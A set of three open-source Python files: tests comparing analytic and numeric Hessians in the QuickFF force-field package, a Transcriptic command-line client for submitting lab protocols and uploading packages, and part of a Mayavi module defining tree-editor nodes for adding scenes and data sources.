rs = np.array([system.pos[j] for j in dihed])
return dihed_angle(rs)[0]
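# Added note (hedged): for periodic systems the three bond vectors are wrapped
# with the minimum image convention (system.cell.mic) before the dihedral is
# evaluated, so the angle is computed between the nearest periodic images.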
def check_hessian_bonds(name, tol=1e-3*kjmol/angstrom**2):
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
for term in valence.iter_terms('BONDHARM'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=1.00, high=2.00)*angstrom
fc = np.random.uniform(low=1000, high=3000)*kjmol/angstrom**2
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current bond
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/A^2 RV=%7.3f A ): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(term.basename, fc/(kjmol/angstrom**2), rv/angstrom, iM, jM, M/(kjmol/angstrom**2)))
assert M<tol
del system, valence, ref, num
def check_hessian_bends(name, tol=1e-3*kjmol/angstrom**2):
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
for term in valence.iter_terms('BENDAHARM'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=10, high=170)*deg
fc = np.random.uniform(low=100, high=1000)*kjmol/rad**2
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current bend
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/rad^2 RV=%7.3f deg): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(term.basename, fc/(kjmol/rad**2), rv/deg, iM, jM, M/(kjmol/angstrom**2)))
assert M<tol
del system, valence, ref, num
def check_hessian_dihedrals(name, tol=1e-3*kjmol/angstrom**2):
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
ref, num = None, None
for term in valence.iter_terms('TORS'):
psi0 = get_dihedral_angle(term, system)
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=0, high=180)*deg #q0
fc = np.random.uniform(low=10, high=50)*kjmol
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current dihedral
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (eq=%.1f deg random FC=%8.3f kjmol RV=%7.3f deg): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(
term.basename, psi0/deg, fc/kjmol, rv/deg, iM, jM, M/(kjmol/angstrom**2)
))
assert M<tol
del system, valence, ref, num
def check_hessian_oops(name, tol=1e-3*kjmol/angstrom**2):
with log.section('PROGRAM', 2):
system, ref = read_system(name)
set_ffatypes(system, 'highest')
valence = ValenceFF(system, Settings())
for term in valence.iter_terms('/OOPDIST'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = 0.0
fc = np.random.uniform(low=500, high=5000)*kjmol/angstrom**2
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current oop
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/A^2 RV=%7.3f A ): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(
term.basename, fc/(kjmol/angstrom**2), rv/angstrom, iM, jM, M/(kjmol/angstrom**2)
))
assert M<tol
del ref, num
for term in valence.iter_terms('SQOOPDIST'):
inonzero, izero = get_indices_zero_nonzero(term, len(system.numbers))
rv = np.random.uniform(low=0.01, high=0.1)*angstrom**2
fc = np.random.uniform(low=500, high=5000)*kjmol/angstrom**4
ref, num = get_analytic_numeric_hessian(valence, term, fc=fc, rv0=rv)
#assert that hessian elements of atoms not part of the current oop
#are zero
if len(izero[0])>0:
assert (abs(ref[izero])).max()<1e-12*kjmol/angstrom**2
assert (abs(num[izero])).max()<1e-12*kjmol/angstrom**2
M = (abs(ref-num)).max()
iM, jM = np.where(abs(ref-num)==M)[0][0], np.where(abs(ref-num)==M)[1][0]
print('%25s (random FC=%8.3f kjmol/A^4 RV=%7.3f A^2): MaxDev(%2i,%2i)=%.3e kjmol/A^2' %(term.basename, fc/(kjmol/angstrom**4), rv/angstrom**2, iM, jM, M/(kjmol/angstrom**2)))
assert M<tol
del ref, num
del system, valence
def test_terms_water():
check_terms('water/gaussian.fchk')
def test_terms_methane():
check_terms('methane/gaussian.fchk')
def test_terms_ethene():
check_terms('ethene/gaussian.fchk')
def test_terms_ethanol():
check_terms('ethanol/gaussian.fchk')
def test_terms_amoniak():
check_terms('amoniak/gaussian.fchk')
def test_terms_benzene():
check_terms('benzene/gaussian.fchk')
def test_hessian_bonds_water():
check_hessian_bonds('water/gaussian.fchk')
def test_hessian_bends_water():
check_hessian_bends('water/gaussian.fchk')
def test_hessian_bonds_methane():
check_hessian_bonds('methane/gaussian.fchk')
def test_hessian_bends_methane():
check_hessian_bends('methane/gaussian.fchk')
def test_hessian_bonds_ethane():
check_hessian_bonds('ethane/gaussian.fchk')
def test_hessian_bends_ethane():
check_hessian_bends('ethane/gaussian.fchk')
def test_hessian_dihedrals_ethane():
check_hessian_dihedrals('ethane/gaussian.fchk')
def test_hessian_bonds_ethene():
check_hessian_bonds('ethene/gaussian.fchk')
def test_hessian_bends_ethene():
check_hessian_bends('ethene/gaussian.fchk')
def test_hessian_dihedrals_ethene():
check_hessian_dihedrals('ethene/gaussian.fchk')
def test_hessian_oops_ethene():
check_hessian_oops('ethene/gaussian.fchk')
def test_hessian_bonds_ethanol():
check_hessian_bonds('ethanol/gaussian.fchk')
def test_hessian_bends_ethanol():
check_hessian_bends('ethanol/gaussian.fchk')
def test_hessian_dihedrals_ethanol():
check_hessian_dihedrals('ethanol/gaussian.fchk')
def test_hessian_bonds_amoniak():
check_hessian_bonds('amoniak/gaussian.fchk')
def test_hessian_bends_amoniak():
check_hessian_bends('amoniak/gaussian.fchk')
def test_hessian_oops_amoniak():
check_hessian_oops('amoniak/gaussian.fchk')
def test_hessian_bonds_benzene():
check_hessian_bonds('benzene/gaussian.fchk')
def test_hessian_bends_benzene():
check_hessian_bends('benzene/gaussian.fchk')
def test_hessian_dihedrals_benzene():
check_hessian_dihedrals('benzene/gaussian.fchk')
def test_hessian_oops_benzene():
check_hessian_oops('benzene/gaussian.fchk')
|
molmod/QuickFF
|
quickff/tests/test_valence.py
|
Python
|
gpl-3.0
| 14,711
|
[
"Gaussian"
] |
4ab92d5381efcbaf779e8618a52cc426943c98c1833e8531b095126e738c4cea
|
import sys
import json
from os.path import expanduser, isfile
import locale
import ap2en
import click
import requests
from collections import OrderedDict
import zipfile
import os
import time
import xml.etree.ElementTree as ET
import re
# Workaround to support the correct input for both Python 2 and 3. Always use
# input() which will point to the correct builtin.
try:
input = raw_input
except NameError:
pass
class Config:
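    """Holds Transcriptic API credentials and the organization subdomain,
    and wraps authenticated GET/POST requests against the API root."""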
def __init__(self, api_root, email, token, organization):
self.api_root = api_root
self.email = email
self.token = token
self.organization = organization
@staticmethod
def from_file(path):
with click.open_file(expanduser(path), 'r') as f:
cfg = json.loads(f.read())
return Config(**cfg)
def save(self, path):
with click.open_file(expanduser(path), 'w') as f:
f.write(json.dumps({
'email': self.email,
'token': self.token,
'organization': self.organization,
'api_root': self.api_root,
}, indent=2))
def url(self, path):
return "%s/%s/%s" % (self.api_root, self.organization, path)
def post(self, path, **kwargs):
default_headers = {
'X-User-Email': self.email,
'X-User-Token': self.token,
'Content-Type': 'application/json',
'Accept': 'application/json',
}
default_headers.update(kwargs.pop('headers', {}))
return requests.post(self.url(path), headers=default_headers, **kwargs)
def get(self, path, **kwargs):
default_headers = {
'X-User-Email': self.email,
'X-User-Token': self.token,
'Content-Type': 'application/json',
'Accept': 'application/json',
}
default_headers.update(kwargs.pop('headers', {}))
return requests.get(self.url(path), headers=default_headers, **kwargs)
@click.group()
@click.option('--apiroot', default=None)
@click.option('--config',
envvar='TRANSCRIPTIC_CONFIG',
default='~/.transcriptic',
help='Specify a configuration file')
@click.option('--organization', '-o', default=None, help='The organization to associate your login with')
@click.pass_context
def cli(ctx, apiroot, config, organization):
'''A command line tool for submitting protocols to Transcriptic and more'''
if ctx.invoked_subcommand not in ['login', 'preview', 'run']:
try:
ctx.obj = Config.from_file(config)
if organization is not None:
ctx.obj.organization = organization
if apiroot is not None:
ctx.obj.api_root = apiroot
except IOError:
click.echo("Error reading config file, running "
"`transcriptic login` ...")
ctx.invoke(login)
@cli.command()
@click.argument('file', default='-')
@click.option('--project', '-p',
metavar='PROJECT_ID',
required=True, help='Project id or name to submit the run to. '
'use transcriptic projects command to list'
' existing projects.')
@click.option('--title', '-t', help='Optional title of your run')
@click.option('--test', help='Submit this run in test mode', is_flag=True)
@click.pass_context
def submit(ctx, file, project, title, test):
'''Submit your run to the project specified'''
project = get_project_id(project)
if not project:
return
with click.open_file(file, 'r') as f:
try:
protocol = json.loads(f.read())
except ValueError:
click.echo("Error: Could not submit since your manifest.json file is "
"improperly formatted.")
return
if test:
test = True
response = ctx.obj.post(
'%s/runs' % project,
data=json.dumps({
"title": title,
"protocol": protocol,
"test_mode": test
}))
if response.status_code == 201:
click.echo(
"Run created: %s" %
ctx.obj.url("%s/runs/%s" % (project, response.json()['id'])))
return response.json()['id']
elif response.status_code == 404:
click.echo("Error: Couldn't create run (404). \nAre you sure the project %s "
"exists, and that you have access to it?" %
ctx.obj.url(project))
elif response.status_code == 422:
click.echo("Error creating run: %s" % response.text)
else:
click.echo("Unknown error: %s" % response.text)
@cli.command()
@click.argument('package', required=False)
@click.option('--name', '-n', help="Optional name for your zip file")
@click.pass_context
def release(ctx, name=None, package=None):
'''Compress the contents of the current directory to upload as a release'''
deflated = zipfile.ZIP_DEFLATED
def makezip(d, archive):
for (path, dirs, files) in os.walk(d):
for f in files:
if ".zip" not in f:
archive.write(os.path.join(path, f))
return archive
with open('manifest.json', 'rU') as manifest:
        filename = name or 'release_v%s' % json.load(manifest)['version']
if os.path.isfile(filename + ".zip"):
new = click.prompt("You already have a release for this "
"version number in this directory, make "
"another one? [y/n]",
default = "y")
if new == "y":
num_existing = sum([1 for x in os.listdir('.') if filename in x])
filename = filename + "-" + str(num_existing)
else:
return
click.echo("Compressing all files in this directory...")
zf = zipfile.ZipFile(filename + ".zip", 'w', deflated)
archive = makezip('.', zf)
zf.close()
click.echo("Archive %s created." % (filename + ".zip"))
if package:
package_id = get_package_id(package) or get_package_name(package)
ctx.invoke(upl, archive=(filename + ".zip"), package=package_id)
@cli.command("upload")
@click.argument('archive', required=True, type=click.Path(exists=True))
@click.argument('package', required=True)
@click.pass_context
def upl(ctx, archive, package):
"""Upload an existing archive to an existing package"""
try:
package_id = get_package_id(package.lower()) or get_package_name(package.lower())
click.echo("Uploading %s to %s" % (archive,
(get_package_name(package_id.lower()) or
get_package_id(package_id.lower()))))
except AttributeError:
click.echo("Error: Invalid package id or name.")
return
with click.progressbar(None, 100, "Upload Progress",
show_eta = False, width=70,
fill_char = "|", empty_char= "-") as bar:
bar.update(10)
sign = requests.get('https://secure.transcriptic.com/upload/sign',
params={
'name': archive
},
headers={
'X-User-Email': ctx.obj.email,
'X-User-Token': ctx.obj.token,
'Content-Type': 'application/json',
'Accept': 'application/json',
})
info = json.loads(sign.content)
bar.update(30)
url = 'https://transcriptic-uploads.s3.amazonaws.com'
files = {'file': open(os.path.basename(archive), 'rb')}
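        # Browser-style S3 form POST: the policy and signature returned by
        # the /upload/sign endpoint authorize uploading exactly this key.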
data = OrderedDict([
('key', info['key']),
('AWSAccessKeyId', 'AKIAJVJ67EJYCQXO7ZSQ'),
('acl', 'private'),
('success_action_status', '201'),
('policy', info['policy']),
('signature', info['signature']),
])
response = requests.post(url, data=data, files=files)
bar.update(20)
response_tree = ET.fromstring(response.content)
loc = dict((i.tag, i.text) for i in response_tree)
try:
up = ctx.obj.post('/packages/%s/releases/' % package_id,
data = json.dumps({"release":
{
"binary_attachment_url": loc["Key"]
}
}),
headers= {
"Origin": "https://secure.transcriptic.com/",
"Content-Type": "application/json"
})
            release_id = json.loads(up.content)['id']  # don't shadow the re module
except ValueError:
click.echo("\nError: There was a problem uploading your release. \nVerify"
" that your manifest.json file is properly formatted and"
" that all previews in your manifest produce valid "
"Autoprotocol by using the `transcriptic preview` "
"and/or `transcriptic analyze` commands.")
return
bar.update(20)
time.sleep(10)
        status = ctx.obj.get('/packages/%s/releases/%s?_=%s' % (package_id, release_id,
                                                                int(time.time())))
published = json.loads(status.content)['published']
errors = status.json()['validation_errors']
bar.update(30)
if errors:
click.echo("\nPackage upload to %s unsuccessful. "
"The following error was "
"returned: %s" %
(get_package_name(package_id),
(',').join(e.get('message', '[Unknown]') for
e in errors)))
else:
click.echo("\nPackage uploaded successfully! \n"
"Visit %s to publish." % ctx.obj.url('packages/%s' %
package_id))
@cli.command()
@click.pass_context
@click.option("-i")
def packages(ctx, i):
    '''List packages in your organization'''
response = ctx.obj.get('/packages/')
package_names = {}
if response.status_code == 200:
for pack in response.json():
package_names[str(pack['name']).lower().replace("com.%s." % ctx.obj.organization, "")] = str(pack['id'])
if i:
return package_names
else:
click.echo('{:^40}'.format("PACKAGE NAME") + "|" +
'{:^40}'.format("PACKAGE ID"))
click.echo('{:-^80}'.format(''))
for name, id in package_names.items():
click.echo('{:<40}'.format(name) + "|" +
'{:^40}'.format(id))
click.echo('{:-^80}'.format(''))
@cli.command("new-package")
@click.argument('name')
@click.argument('description')
@click.pass_context
def new_package(ctx, description, name):
'''Create a new empty protocol package'''
existing = ctx.obj.get('/packages/')
for p in existing.json():
if name == p['name'].split('.')[-1]:
click.echo("You already have an existing package with the name \"%s\"."
" Please choose a different package name." % name)
return
new_pack = ctx.obj.post('/packages/',
data = json.dumps({"description": description,
"name": "%s%s" % ("com.%s." % ctx.obj.organization, name)
}))
if new_pack.status_code == 201:
click.echo("New package %s created with id %s \n"
"View it at %s" % (name, new_pack.json()['id'],
ctx.obj.url('packages/%s' %
new_pack.json()['id'])))
else:
click.echo("There was an error creating this package.")
@cli.command()
@click.pass_context
@click.option("-i")
def projects(ctx, i):
'''List the projects in your organization'''
response = ctx.obj.get('')
proj_names = {}
if response.status_code == 200:
for proj in response.json()['projects']:
proj_names[proj['name']] = proj['id']
if i:
return {k.lower(): v for k,v in proj_names.items()}
else:
click.echo('{:^35}'.format("PROJECT NAME") + "|" +
'{:^35}'.format("PROJECT ID"))
click.echo('{:-^70}'.format(''))
for name, i in proj_names.items():
click.echo('{:<35}'.format(name) + "|" +
'{:^35}'.format(i))
click.echo('{:-^70}'.format(''))
else:
click.echo("There was an error listing the projects in your "
"organization. Make sure your login details are correct.")
@cli.command("new-project")
@click.argument('name')
@click.pass_context
def new_project(ctx, name):
'''Create a new empty project'''
existing = ctx.obj.get('')
for p in existing.json()['projects']:
if name == p['name'].split('.')[-1]:
click.echo("You already have an existing project with the name \"%s\"."
" Please choose a different project name." % name)
return
new_proj = ctx.obj.post('',
data= json.dumps({
"name": name
})
)
if new_proj.status_code == 201:
click.echo("New project '%s' created with id %s \nView it at %s" %
(name, new_proj.json()['id'],
ctx.obj.url('projects/%s' % new_proj.json()['id'])))
else:
click.echo("There was an error creating this package.")
@cli.command()
def init():
'''Initialize directory with blank manifest.json file'''
manifest_data = {
"version": "1.0.0",
"format": "python",
"license": "MIT",
"protocols": [
{
"name": "SampleProtocol",
"description": "This is a protocol.",
"command_string": "python sample_protocol.py",
"preview": {
"refs":{},
"parameters": {}
},
"inputs": {},
"dependencies": []
}
]
}
if isfile('manifest.json'):
click.confirm("This directory already contains a manifest.json file, "
"would you like to overwrite it with an empty one? ",
default = False,
abort = True)
with open('manifest.json', 'w+') as f:
click.echo('Creating empty manifest.json...')
f.write(json.dumps(manifest_data, indent=2))
click.echo("manifest.json created")
@cli.command()
@click.argument('file', default='-')
@click.option('--test', help='Analyze this run in test mode', is_flag=True)
@click.pass_context
def analyze(ctx, file, test):
'''Analyze autoprotocol'''
with click.open_file(file, 'r') as f:
try:
protocol = json.loads(f.read())
except ValueError:
click.echo("Error: Could not analyze since your manifest.json file is "
"improperly formatted.")
return
response = \
ctx.obj.post(
'analyze_run',
data=json.dumps({"protocol": protocol, "test_mode": test})
)
if response.status_code == 200:
click.echo(u"\u2713 Protocol analyzed")
price(response.json())
elif response.status_code == 422:
click.echo("Error in protocol: %s" % response.text)
else:
click.echo("Unknown error: %s" % response.text)
def price(response):
def count(thing, things, num):
click.echo(" %s %s" % (num, thing if num == 1 else things))
count("instruction", "instructions", len(response['instructions']))
count("container", "containers", len(response['refs']))
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
click.echo(" %s" %
locale.currency(float(response['total_cost']), grouping=True))
for w in response['warnings']:
message = w['message']
if 'instruction' in w['context']:
context = "instruction %s" % w['context']['instruction']
else:
context = json.dumps(w['context'])
click.echo("WARNING (%s): %s" % (context, message))
@cli.command()
@click.argument('protocol_name')
def preview(protocol_name):
'''Preview the Autoprotocol output of a script'''
with click.open_file('manifest.json', 'r') as f:
try:
manifest = json.loads(f.read())
except ValueError:
click.echo("Error: Your manifest.json file is improperly formatted. "
"Please double check your brackets and commas!")
return
try:
p = next(p for p in manifest['protocols'] if p['name'] == protocol_name)
except StopIteration:
click.echo("Error: The protocol name '%s' does not match any protocols "
"that can be previewed from within this directory. \nCheck "
"either your protocol's spelling or your manifest.json file "
"and try again." % protocol_name)
return
try:
command = p['command_string']
except KeyError:
click.echo("Error: Your manifest.json file does not have a \"command_string\""
" key.")
return
from subprocess import call
import tempfile
with tempfile.NamedTemporaryFile() as fp:
try:
fp.write(json.dumps(p['preview']))
except KeyError:
click.echo("Error: The manifest.json you're trying to preview doesn't "
"contain a \"preview\" section")
return
fp.flush()
call(["bash", "-c", command + " " + fp.name])
@cli.command()
@click.argument('file', default='-')
@click.pass_context
def summarize(ctx, file):
with click.open_file(file, 'r') as f:
try:
protocol = json.loads(f.read())
except ValueError:
click.echo("The autoprotocol you're trying to summarize is invalid.")
return
ap2en.AutoprotocolParser(protocol)
@cli.command()
@click.argument('protocol_name')
@click.argument('args', nargs=-1)
def run(protocol_name, args):
'''Run a protocol by passing it a config file (without submitting or analyzing)'''
with click.open_file('manifest.json', 'r') as f:
try:
manifest = json.loads(f.read())
except ValueError:
click.echo("Error: Your manifest.json file is improperly formatted. "
"Please double check your brackets and commas!")
return
try:
p = next(p for p in manifest['protocols'] if p['name'] == protocol_name)
except StopIteration:
click.echo("Error: The protocol name '%s' does not match any protocols "
"that can be previewed from within this directory. \nCheck "
"either your spelling or your manifest.json file and try "
"again." % protocol_name)
return
try:
command = p['command_string']
except KeyError:
click.echo("Error: Your manifest.json file does not have a \"command_string\""
" key.")
return
from subprocess import call
call(["bash", "-c", command + " " + ' '.join(args)])
@cli.command()
@click.option('--api-root', default='https://secure.transcriptic.com')
@click.pass_context
def login(ctx, api_root):
'''Log in to your Transcriptic account'''
email = click.prompt('Email')
password = click.prompt('Password', hide_input=True)
r = requests.post(
"%s/users/sign_in" % api_root,
data=json.dumps({
'user': {
'email': email,
'password': password,
},
}),
headers={
'Accept': 'application/json',
'Content-Type': 'application/json',
})
if r.status_code != 200:
click.echo("Error logging into Transcriptic: %s" % r.json()['error'])
sys.exit(1)
user = r.json()
token = (
user.get('authentication_token') or
user['test_mode_authentication_token']
)
if len(user['organizations']) < 1:
click.echo("Error: You don't appear to belong to any organizations. \nVisit %s "
"and create an organization." % api_root)
sys.exit(1)
if len(user['organizations']) == 1:
organization = user['organizations'][0]['subdomain']
else:
click.echo("You belong to %s organizations:" %
len(user['organizations']))
for o in user['organizations']:
click.echo(" %s (%s)" % (o['name'], o['subdomain']))
organization = click.prompt(
'Which would you like to login as',
default=user['organizations'][0]['subdomain'],
prompt_suffix='? ')
r = requests.get('%s/%s' % (api_root, organization), headers={
'X-User-Email': email,
'X-User-Token': token,
'Accept': 'application/json',
})
if r.status_code != 200:
click.echo("Error accessing organization: %s" % r.text)
sys.exit(1)
ctx.obj = Config(api_root, email, token, organization)
ctx.obj.save(ctx.parent.params['config'])
click.echo('Logged in as %s (%s)' % (user['email'], organization))
@click.pass_context
def get_project_id(ctx, name):
projs = ctx.invoke(projects, i=True)
id = projs.get(name.lower())
if not id:
id = name if name in projs.values() else None
if not id:
click.echo("A project with the name or id '%s' was not found in your "
"organization." % name)
return
return id
@click.pass_context
def get_package_id(ctx, name):
package_names = ctx.invoke(packages, i=True)
package_names = {k.lower(): v for k,v in package_names.items()}
package_id = package_names.get(name)
if not package_id:
package_id = name if name in package_names.values() else None
if not package_id and __name__ == "__main__":
click.echo("The package %s does not exist in your organization." % name)
return
return package_id
@click.pass_context
def get_package_name(ctx, id):
package_names = {v: k for k, v in ctx.invoke(packages, i=True).items()}
package_name = package_names.get(id)
if not package_name:
package_name = id if id in package_names.values() else None
if not package_name and __name__ == "__main__":
click.echo("The id %s does not match any package in your organization."
% id)
return
return package_name
def parse_json(json_file):
try:
return json.load(open(json_file))
except ValueError as e:
click.echo('Invalid json: %s' % e)
return None
def get_protocol_list(json_file):
manifest = parse_json(json_file)
protocol_list = [p['name'] for p in manifest['protocols']]
return protocol_list
def pull(nested_dict):
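    # Recursively strip a manifest input down to its leaf type definitions:
    # plain typed inputs are returned as-is, nested "inputs" containers are
    # flattened one level at a time.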
if "type" in nested_dict and "inputs" not in nested_dict:
return nested_dict
else:
inputs = {}
if "type" in nested_dict and "inputs" in nested_dict:
for param, input in nested_dict["inputs"].items():
inputs[str(param)] = pull(input)
return inputs
else:
return nested_dict
def regex_manifest(protocol, input):
'''Special input types, gets updated as more input types are added'''
if "type" in input and input["type"] == "choice":
if "options" in input:
            pattern = r'\[(.*?)\]'
match = re.search(pattern, str(input["options"]))
if not match:
click.echo("Error in %s: input type \"choice\" options must be in the "
"form of: \n[\n {\n \"value\": <choice value>, \n \"label\": "
"<choice label>\n },\n ...\n]" % protocol['name'])
raise RuntimeError
else:
click.echo("Must have options for 'choice' input type." +
" Error in: " + protocol["name"])
raise RuntimeError
def iter_json(manifest):
all_types = {}
try:
protocol = manifest['protocols']
except TypeError:
click.echo("Error: Your manifest.json file doesn't contain valid JSON and"
" cannot be formatted.")
raise RuntimeError
for protocol in manifest["protocols"]:
types = {}
for param, input in protocol["inputs"].items():
types[param] = pull(input)
if isinstance(input, dict):
if input["type"] == "group" or input["type"] == "group+":
for i, j in input.items():
if isinstance(j, dict):
for k, l in j.items():
regex_manifest(protocol, l)
else:
regex_manifest(protocol, input)
all_types[protocol["name"]] = types
return all_types
@cli.command()
@click.argument('manifest', default='manifest.json')
def format(manifest):
'''Check autoprotocol format of manifest.json'''
manifest = parse_json(manifest)
try:
iter_json(manifest)
click.echo("No manifest formatting errors found.")
except RuntimeError:
pass
|
therzka/runner
|
transcriptic.py
|
Python
|
bsd-3-clause
| 25,847
|
[
"VisIt"
] |
4c5692012271afd3bf035e5a19d6b2eafc0f3b84fcf477bcdb717c14d8380d38
|
"""
Custom nodes for a Tree Editor that provide views for adding various nodes
to the tree.
"""
# Authors: Judah De Paula <judah@enthought.com>
# Prabhu Ramachandran <prabhu_r@users.sf.net>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
# Enthought library imports.
from traits.api import (HasTraits, Str, Property, Any, Button,
List, Instance, provides,
ToolbarButton)
from traitsui.api import View, Item, Group,\
TextEditor, TreeEditor, TreeNode, ListEditor, ITreeNode
from pyface.api import ImageResource
from pyface.resource.api import resource_path
# Local imports.
from .registry import registry
###############################################################################
# AdderNode class
###############################################################################
@provides(ITreeNode)
class AdderNode(TreeNode):
""" Base class that will display a TreeNode to add items to the tree.
"""
# String to be shown in the TreeEditor.
label = Str('Base AdderNode')
# Default tooltip for this class.
tooltip = Str('Add an item')
# The parent object that should be manipulated for adding children.
object = Any
# Duck-typing is necessary since Mayavi assumes nodes always have scenes.
scene = Property
# Trait view to show in the Mayavi current object panel.
view = View(Group(label='AdderNode'))
def dialog_view(self):
""" View shown by double-clicking on the node. Same as in Base().
"""
view = self.trait_view()
view.buttons = [ ]
view.title = self.label
view.icon = ImageResource('add.ico')
view.resizable = True
view.width = 350
view.height = 650
return view
def _get_scene(self):
""" Trait Property getter for 'scene'.
"""
object = self.object
if isinstance(object, AdderNode):
return None
if object is not None:
return object.scene
else:
return None
#------------------------------------------------------------------------
# The ITreeNode interface needed by the Qt tree_editor
#------------------------------------------------------------------------
def get_label(self):
return self.label
def get_icon(self, obj, is_expanded=False):
return self.icon_name
def get_icon_path(self):
return resource_path()
def get_tooltip(self):
return self.tooltip
def allows_children(self):
return False
def get_children_id(self, node=None):
return []
def when_label_changed(self, label_updated, remove):
return
def when_column_labels_change(self, listener, remove):
return
###############################################################################
# SceneAdderNode class
###############################################################################
class SceneAdderNode(AdderNode):
""" Subclass for adding Scene nodes to a Mayavi Engine node.
"""
# String to be shown in the TreeEditor.
label = Str('Add a new scene')
# The name of the icon
icon_name = Str('add_scene.png')
# Button for the View.
add_scene = Button('Add a new scene',
image=ImageResource('add_scene.png'))
# Trait view to show in the Mayavi current object panel.
view = View(Group(Item('add_scene', show_label=False, style='custom'),
label='Add a scene'))
def _add_scene_fired(self):
""" Trait handler for when the add_scene button is clicked.
"""
self.object.new_scene()
###############################################################################
# DocumentedItem class
###############################################################################
class DocumentedItem(HasTraits):
""" Container to hold a name and a documentation for an action.
"""
# Name of the action
name = Str
# Button to trigger the action
add = ToolbarButton('Add', orientation='horizontal',
image=ImageResource('add.ico'))
# Object the action will apply on
object = Any
# Two lines documentation for the action
documentation = Str
view = View('_',
Item('add', style='custom', show_label=False),
Item('documentation', style='readonly',
editor=TextEditor(multi_line=True),
resizable=True,
show_label=False),
)
def _add_fired(self):
""" Trait handler for when the add_source button is clicked in
one of the sub objects in the list.
"""
action = getattr(self.object.menu_helper, self.id)
action()
def documented_item_factory(name='', documentation='',
id='', object=None):
""" Factory for creating a DocumentedItem with the right button
label.
"""
    documentation = documentation.replace('\n', '')
    documentation = documentation.replace('  ', '')
class MyDocumentedItem(DocumentedItem):
add = ToolbarButton('%s' % name, orientation='horizontal',
image=ImageResource('add.ico'))
return MyDocumentedItem(
name=name,
documentation=documentation,
id=id,
object=object)
###############################################################################
# ListAdderNode class
###############################################################################
class ListAdderNode(AdderNode):
""" A node for adding object, with a list of objects to add generated
from the registry.
"""
# The list of items to display to the user.
items_list = List(DocumentedItem)
# A reference to the registry, to generate this list.
items_list_source = List()
# Selected item
selected_item = Instance(DocumentedItem)
# A reference to self, to allow to build the tree view.
self = Instance(AdderNode)
# The icon of the displayed objects
icon_name = Str('add.ico')
def _self_default(self):
return self
def default_traits_view(self):
nodes = [TreeNode(node_for=[AdderNode],
label='name',
copy=False,
delete=False,
rename=False,
children='items_list',
),
TreeNode(node_for=[DocumentedItem],
label='name',
copy=False,
delete=False,
rename=False,
icon_item=self.icon_name,
),
]
tree_editor = TreeEditor(editable=False,
hide_root=True,
orientation='vertical',
selected='object.selected_item',
nodes=nodes,
on_dclick='object._on_tree_dclick',
)
view = View(Item('self',
show_label=False,
editor=tree_editor,
resizable=True,
springy=True,
height=0.5),
Item('selected_item', style='custom', show_label=False,
height=0.5),
resizable=True)
return view
def _object_changed(self, value):
""" Trait handler for when the self.object trait changes.
"""
result = []
if value is not None:
# Don't need 'x', but do need to generate the actions.
x = value.menu_helper.actions
for src in self.items_list_source:
if not self._is_action_suitable(value, src):
continue
name = src.menu_name.replace('&','')
result.append(
documented_item_factory(
name=name,
documentation=src.help,
id=src.id,
object=value)
)
self.items_list = result
def _is_action_suitable(self, object, src):
""" Check that the action described by src can be applied on the
given object.
"""
if hasattr(object.menu_helper, 'check_%s' % src.id) \
and getattr(object.menu_helper, 'check_%s' % src.id)():
return True
else:
return False
def _on_tree_dclick(self, object):
""" Called when an user double clicks on an item in the tree
view.
"""
object._add_fired()
###############################################################################
# SourceAdderNode class
###############################################################################
class SourceAdderNode(ListAdderNode):
""" Tree node that presents a view to the user to add a scene source.
"""
# Button for adding a data file, with automatic format checking.
open_file = ToolbarButton('Load data from file',
orientation='horizontal',
image=ImageResource('file.png'))
# A reference to the registry, to generate this list.
items_list_source = [source for source in registry.sources
if len(source.extensions) == 0]
# The string to display on the icon in the TreeEditor.
label = 'Add Data Source'
# The icon of the displayed objects
icon_name = Str('source.ico')
# Trait view to show in the Mayavi current object panel.
def default_traits_view(self):
return View(Group(Group(Item('open_file', style='custom'),
show_labels=False, show_border=False),
Item('items_list', style='readonly',
editor=ListEditor(style='custom')),
show_labels=False,
label='Add a data source'))
def _open_file_fired(self):
""" Trait handler for when the open_file button is clicked.
"""
